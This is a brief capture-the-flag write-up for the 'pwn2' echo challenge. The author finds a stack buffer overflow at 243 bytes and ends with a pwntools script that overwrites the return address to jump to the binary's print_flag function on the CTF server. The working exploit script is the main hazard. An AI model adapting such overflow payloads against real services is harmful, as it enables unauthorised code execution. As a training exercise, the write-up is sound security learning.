pwn2 asks the user to enter a sentence and it will reply with the same message.

I just love repeating what other people say!
I bet I can repeat anything you tell me!

stardibistengodelmisticosoledeimoscardinideltacamorodimontorsi

stardibistengodelmisticosoledeimoscardinideltacamorodimontorsi

My intuition is suggesting me to mess with the length of the input string.

After some trials, I found that with a string longer than 243 characters, the program halts in SIGSEGV.

This time, the buffer is long enough for a shellcraft… if only the NX bit were disabled.

I can’t proceed in that direction. Should I use ROP?

Why the hell? There is the print_flag function in the binary! As regards ASLR and canary, same as pwn1, they are both disabled.

So, the exploit is:

from pwn import *

OFFSET = 243
shell = p32(0x0804854b)
exploit = 'A'*OFFSET + shell
rem = remote('pwn.ctf.tamu.edu', 4322)
rem.sendline(exploit)
rem.interactive()

Flag captured :-D